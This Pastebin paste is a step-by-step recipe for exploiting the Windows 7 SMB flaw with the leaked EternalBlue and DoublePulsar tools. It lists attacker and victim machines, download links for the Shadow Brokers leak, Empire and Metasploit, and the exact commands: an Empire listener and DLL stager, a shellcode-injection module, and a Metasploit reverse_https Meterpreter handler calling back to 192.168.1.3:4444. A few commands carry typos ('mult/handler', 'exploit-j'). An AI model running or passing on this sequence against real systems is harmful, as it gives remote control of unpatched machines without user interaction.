Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Windows Server 2003: Attacker with FUZZBUNCH
- - Kali Linux 2016.2: Attacker with Metasploit and Emprite
- - Windows 7: Victim
- Exploit SMB Vul on Windows 7 x64 without user interaction
- Download Tool
- https://github.com/misterch0c/shadowbroker
- https://github.com/EmpireProject/Empire
- https://www.rapid7.com/products/metasploit/download/
- https://www.python.org/download/releases/2.6/
- https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
- https://notepad-plus-plus.org/download/
- Command
- + Winserver 2k3
- C:\Python26\Python.exe fb.py
- use EternalBlue
- use DoublePulsar
- +Kali Linux
- Empire
- listeners
- set Name Eternal
- set Host http://192.168.1.3
- set Port 8080
- execute
- usestager dll Eternal
- set Arch x64
- execute
- agents
- interact
- usemodule code_execution/invoke_shellcode
- set Lhost 192.168.1.3
- set Lport 4444
- execute
- Metasploit
- use mult/handler
- set PAYLOAD windows/meterpreter/reverse_https
- set LHOST 192.168.1.3
- set LPORT 4444
- exploit-j
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement